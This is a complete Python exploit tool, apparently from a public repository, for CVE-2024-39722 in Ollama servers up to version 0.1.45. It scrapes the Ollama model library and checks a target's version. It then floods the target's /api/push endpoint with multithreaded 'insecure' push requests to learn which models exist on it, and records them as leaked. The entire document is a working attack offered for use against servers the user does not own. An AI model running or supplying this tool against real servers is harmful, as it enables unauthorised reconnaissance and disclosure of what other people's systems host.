README.md
Rendering markdown...
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import sys
import json
import requests
from lxml import etree
import argparse
from termcolor import colored
import threading
import queue
from threading import Lock
from urllib.parse import urlparse
def print_banner():
    """Write the tool's boxed title banner to stdout, coloured cyan."""
    # The box lines stay flush-left inside the literal so the emitted text
    # is exactly what the script has always printed.
    banner_text = """
┌─────────────────────────────────────────────────────┐
│ Ollama CVE-2024-39722 Model Existence Disclosure │
│ Exploit for Ollama versions <= 0.1.45 │
│ │
│ CVSS Score: 7.5 │
└─────────────────────────────────────────────────────┘
"""
    coloured_banner = colored(banner_text, "cyan")
    print(coloured_banner)
def get_html_content(url, cache_file="response.html", timeout=10):
    """
    Retrieves HTML content from the cache file or, failing that, from the URL

    An existing, parseable cache file always wins over the network. If the
    cache file exists but cannot be read or parsed, it is ignored with a
    warning and the page is downloaded again (overwriting the cache).

    Args:
        url (str): URL to retrieve
        cache_file (str): Cache file name
        timeout (float): Value passed to requests.get() as its timeout, so a
            silent server cannot block the script forever
    Returns:
        tuple: (etree object or None, status) where status is "cached",
            "fetched" or "error"
    """
    if os.path.exists(cache_file):
        try:
            tree = etree.parse(cache_file, etree.HTMLParser())
        except (OSError, etree.LxmlError) as e:
            # A broken cache should not abort the crawl; fall through and
            # fetch a fresh copy instead.
            print(colored(f"[WARNING] Ignoring unreadable cache file {cache_file}: {str(e)}", "yellow"))
        else:
            print(colored(f"[INFO] File {cache_file} already exists!", "green"))
            return tree, "cached"

    try:
        res = requests.get(url, timeout=timeout)
        if res.status_code != 200:
            print(colored(f"[ERROR] Get html source failed! Status code: {res.status_code}", "red"))
            return None, "error"

        print(colored("[INFO] Get html source success!", "green"))
        with open(cache_file, "w", encoding="utf-8") as f:
            f.write(res.text)
        print(colored(f"[INFO] Write html source to file {cache_file} success!", "green"))
        return etree.HTML(res.text), "fetched"
    except Exception as e:
        # Top-level boundary for the crawl step: report and signal "error"
        # rather than crash the CLI on network, file or parse failures.
        print(colored(f"[ERROR] Exception occurred: {str(e)}", "red"))
        return None, "error"
def extract_model_links(html, base_url):
    """
    Extracts model links from HTML

    Every <li> under the element with id "repo" is inspected. The first
    anchor href supplies the model path, its last path segment the model
    name, and the text of the size spans (those carrying an "x-test-size"
    attribute) the tag list. List items without a usable anchor are skipped
    instead of raising IndexError.

    Args:
        html: etree HTML object (anything exposing .xpath())
        base_url (str): Base URL prepended to each relative model path
    Returns:
        list: List of dicts with keys "name", "url" and "tags"
    """
    infos = []
    for item in html.xpath('//*[@id="repo"]/ul/li'):
        hrefs = item.xpath('./a/@href')
        if not hrefs:
            # Not a model entry (no link) - nothing to record.
            continue
        href = hrefs[0]
        # Ignore trailing slashes so "/library/foo/" still yields "foo".
        name = href.rstrip("/").split("/")[-1]
        if not name:
            continue
        tags = item.xpath('./a/div[2]/div/span[@x-test-size]/text()')
        infos.append({
            "name": name,
            "url": base_url + href,
            "tags": tags,
        })
    return infos
def crawl_ollama_models(url="https://ollama.com/library", base_url="https://ollama.com",
                        cache_file="response.html", output_file="links.json"):
    """
    Collects the models listed on the Ollama library page and stores them

    The page is obtained through get_html_content() (cache first), parsed
    with extract_model_links(), echoed entry by entry and finally written
    to output_file as indented UTF-8 JSON.

    Args:
        url (str): Model library URL
        base_url (str): Base URL
        cache_file (str): HTML cache file
        output_file (str): Output JSON file
    Returns:
        list: List of model information (empty when the page is unavailable)
    """
    print(colored("[*] Crawling Ollama models...", "yellow"))

    html, status = get_html_content(url, cache_file)
    if status == "error":
        # Nothing to parse; the helper has already reported why.
        return []

    infos = extract_model_links(html, base_url)
    i = 0
    for info in infos:
        print(colored(f"[INFO] Get link {i+1}: {info}", "green"))
        i += 1
    print(colored(f"[INFO] Get all {len(infos)} links success!", "green"))

    # Persist the model list for the later payload-generation step.
    serialized = json.dumps(infos, ensure_ascii=False, indent=4)
    with open(output_file, "w", encoding="utf-8") as f:
        f.write(serialized)
    print(colored(f"[+] Models saved to {output_file}", "green"))
    return infos
def format_url(url):
    """
    Ensure URL is properly formatted (scheme present, no trailing slashes)

    Surrounding whitespace is dropped. "http://" is prepended unless the
    value already starts with "http://" or "https://" (case-insensitive),
    so hosts whose name merely begins with "http" (e.g. "httpbin.org") are
    handled correctly. All trailing slashes are removed.

    Args:
        url (str): URL to format
    Returns:
        str: Properly formatted URL
    """
    url = url.strip()
    # Compare against the full scheme prefix, not just the letters "http".
    if not url.lower().startswith(("http://", "https://")):
        url = "http://" + url
    return url.rstrip("/")
def check_ollama_version(base_url):
    """
    Ask the server's /api/version endpoint which Ollama release it runs and
    classify that release with is_version_vulnerable()

    Args:
        base_url (str): Base URL of Ollama server
    Returns:
        tuple: (is_vulnerable, version_str or None, error_message or None).
            Any failure (network error, non-200 status, missing "version"
            key, unexpected exception) yields is_vulnerable=False together
            with an explanatory message.
    """
    try:
        # Normalise the base URL, then address the version endpoint
        base_url = format_url(base_url)
        version_url = f"{base_url}/api/version"

        # Short timeout: this is only a quick reachability/version probe
        response = requests.get(version_url, timeout=5)
        if response.status_code != 200:
            return False, None, f"Failed to get version, server returned status code: {response.status_code}"

        data = response.json()
        if "version" not in data:
            return False, None, "Version information not found in response"

        version = data["version"]
        if not is_version_vulnerable(version):
            return False, version, f"Ollama version {version} is not vulnerable to CVE-2024-39722 (requires version ≤ 0.1.45)"

        return True, version, None
    except requests.exceptions.RequestException as e:
        return False, None, f"Connection error: {str(e)}"
    except Exception as e:
        return False, None, f"Error checking Ollama version: {str(e)}"
def is_version_vulnerable(version):
    """
    Check if the given version is vulnerable to CVE-2024-39722 (≤ 0.1.45)

    Only the numeric core of the version is compared. An optional leading
    "v" and anything after the first "-" or "+" (pre-release or build
    suffixes such as "-rc1") are ignored, and missing components count as
    0. Without this, every suffixed version string failed to parse and was
    reported as vulnerable, including clearly newer releases.

    Args:
        version (str): Version string (e.g., "0.1.44" or "0.5.1-rc0")
    Returns:
        bool: True if version is vulnerable (or cannot be parsed at all),
            False otherwise
    """
    try:
        core = version.strip()
        if core[:1] in ("v", "V"):
            core = core[1:]
        # Cut off pre-release / build metadata before reading the numbers.
        for separator in ("-", "+"):
            core = core.split(separator, 1)[0]
        numbers = tuple(int(part) for part in core.split("."))
    except (ValueError, AttributeError, TypeError):
        # If version parsing fails, assume vulnerable to be safe
        print(colored(f"[WARNING] Could not parse version string: {version}", "yellow"))
        return True

    # Pad "0.1" to (0, 1, 0); extra components beyond the third are ignored,
    # which errs on the side of reporting "vulnerable".
    numbers += (0,) * (3 - len(numbers))
    return numbers[:3] <= (0, 1, 45)
def send_api_request(url, payload, timeout=30):
    """
    Sends API request to Ollama server

    Args:
        url (str): Target URL
        payload (dict): JSON payload
        timeout (float): Value passed to requests.post() as its timeout, so
            an unresponsive server cannot block the calling thread forever
    Returns:
        str: Response content or None (if error, including a timeout)
    """
    try:
        response = requests.post(url, json=payload, timeout=timeout)
        return response.text
    except requests.exceptions.RequestException as e:
        print(colored(f"[ERROR] Request exception: {e}", "red"))
        return None
def worker(task_queue, url, leaked_models, print_lock):
    """
    Thread body: drain (index, payload) tasks from the queue until it is empty

    Each payload is sent with send_api_request(). A response that is
    non-empty and does not contain the substring "error" is counted as a
    leaked model and its name is appended to leaked_models.

    Args:
        task_queue: Queue with payloads to process
        url: Target URL
        leaked_models: Shared list to store leaked models
        print_lock: Lock for thread-safe printing
    """
    while True:
        # Non-blocking fetch: an empty queue means this worker is finished.
        try:
            i, payload = task_queue.get_nowait()
        except queue.Empty:
            return

        with print_lock:
            print(colored(f"[*] Testing payload {i+1}: {payload['name']}", "yellow"))

        result = send_api_request(url=url, payload=payload)
        model_leaked = bool(result) and "error" not in result
        if model_leaked:
            with print_lock:
                print(colored(f"[+] Ollama server model leak: {payload['name']}", "green"))
                print(colored(f"[+] Payload: '{json.dumps(payload)}'", "green"))
            leaked_models.append(payload['name'])

        task_queue.task_done()
def exploit_ollama_server(url="http://localhost:11434/api/push", links_file="links.json", thread_count=10):
    """
    Exploits Ollama server by attempting to leak models using payloads from a JSON file

    Steps: normalise the URL, check the server version through
    check_ollama_version(), load the model list from links_file, build one
    payload per "name:tag" combination and test them with worker() threads.

    Args:
        url (str): The URL of the Ollama server API
        links_file (str): Path to the JSON file containing links data
            (a list of objects with "name" and "tags" keys)
        thread_count (int): Number of threads to use for payload testing;
            values below 1 are treated as 1
    Returns:
        list: List of leaked model names (empty if the server is not
            vulnerable or the links file cannot be used)
    """
    print(colored("[*] Starting Ollama server exploitation...", "yellow"))
    # Format URL properly
    url = format_url(url)
    # Get base URL for version checking
    parsed_url = urlparse(url)
    base_url = f"{parsed_url.scheme}://{parsed_url.netloc}"

    # Check if server is vulnerable based on version
    is_vulnerable, version, error = check_ollama_version(base_url)
    if not is_vulnerable:
        if version:
            print(colored(f"[!] Target server is not vulnerable: Ollama v{version}", "yellow"))
        if error:
            print(colored(f"[!] {error}", "yellow"))
        return []
    if version:
        print(colored(f"[+] Target server is vulnerable: Ollama v{version} (≤ 0.1.45)", "green"))

    try:
        # The crawler writes this file as UTF-8 with ensure_ascii=False, so
        # read it back with the same encoding instead of the locale default.
        with open(links_file, 'r', encoding="utf-8") as f:
            data = json.load(f)
            print(colored(f"[INFO] Read {len(data)} links from file {f.name} success!", "green"))
    except Exception as e:
        print(colored(f"[ERROR] Failed to read links file: {str(e)}", "red"))
        return []

    # Create payloads from model data
    payloads = []
    try:
        for model in data:
            for tag in model['tags']:
                payloads.append({
                    "name": model['name'] + ":" + tag,
                    "insecure": True,
                    "stream": True,
                })
    except (KeyError, TypeError) as e:
        # Entries lacking "name"/"tags" (or of the wrong type) mean the file
        # is not in the expected format.
        print(colored(f"[ERROR] Failed to read links file: {str(e)}", "red"))
        return []

    leaked_models = []
    print_lock = Lock()
    # A non-positive thread count would start no workers and silently test
    # nothing, so fall back to a single thread.
    thread_count = max(1, thread_count)
    print(colored(f"[INFO] Generated {len(payloads)} payloads for testing", "green"))
    print(colored(f"[INFO] Using {thread_count} threads for payload testing", "green"))

    # Create a queue and add payloads with their indices
    task_queue = queue.Queue()
    for i, payload in enumerate(payloads):
        task_queue.put((i, payload))

    # Create and start worker threads (never more threads than payloads)
    threads = []
    for _ in range(min(thread_count, len(payloads))):
        thread = threading.Thread(
            target=worker,
            args=(task_queue, url, leaked_models, print_lock)
        )
        thread.daemon = True
        thread.start()
        threads.append(thread)

    # Wait for all threads to complete
    for thread in threads:
        thread.join()

    if leaked_models:
        print(colored(f"[+] Successfully leaked {len(leaked_models)} models", "green"))
    else:
        print(colored("[-] No models leaked", "yellow"))
    return leaked_models
def main():
    """
    Main function: parse the command line and run the requested steps

    Steps, in order: optional crawl of the model library (-c), then, when
    a target is given (-u), either a version check only (-v) or the full
    payload test. Whatever results were collected are written to the
    output file (-o) as JSON.
    """
    parser = argparse.ArgumentParser(description="Ollama CVE-2024-39722 Exploit Tool")
    parser.add_argument("-u", "--url",
                        help="Target Ollama server URL")
    parser.add_argument("-c", "--crawl", action="store_true",
                        help="Crawl Ollama models library")
    parser.add_argument("-o", "--output", default="results.json",
                        help="Output file for results (default: results.json)")
    parser.add_argument("-t", "--threads", type=int, default=10,
                        help="Number of threads to use (default: 10)")
    parser.add_argument("-v", "--version-check", action="store_true",
                        help="Only check if target is vulnerable based on version")
    args = parser.parse_args()
    print_banner()

    # No arguments provided, show help
    if len(sys.argv) == 1:
        parser.print_help()
        sys.exit(1)

    # Reject combinations that would otherwise silently do nothing.
    if args.version_check and not args.url:
        parser.error("--version-check requires a target (-u/--url)")
    if args.threads < 1:
        parser.error("--threads must be at least 1")

    results = {}

    # Crawl Ollama models
    if args.crawl:
        results["crawled_models"] = crawl_ollama_models()

    if args.url:
        url = format_url(args.url)
        if args.version_check:
            # Check version only. Reduce the URL to scheme://host[:port] so a
            # target given as ".../api/push" still reaches /api/version.
            parsed_url = urlparse(url)
            base_url = f"{parsed_url.scheme}://{parsed_url.netloc}"
            is_vulnerable, version, error = check_ollama_version(base_url)
            if is_vulnerable:
                print(colored(f"[+] Target is vulnerable: Ollama v{version} (≤ 0.1.45)", "green"))
            else:
                if version:
                    print(colored(f"[-] Target is not vulnerable: Ollama v{version}", "red"))
                if error:
                    print(colored(f"[!] {error}", "yellow"))
        else:
            # Exploit Ollama server
            # Make sure URL ends with /api/push for exploitation
            if not url.endswith("/api/push"):
                url = f"{url}/api/push"
            results["leaked_models"] = exploit_ollama_server(url=url, thread_count=args.threads)

    # Save results to file (crawl results are kept even in version-check mode)
    if results:
        with open(args.output, "w", encoding="utf-8") as f:
            json.dump(results, f, indent=4)
        print(colored(f"[+] Results saved to {args.output}", "green"))


if __name__ == "__main__":
    main()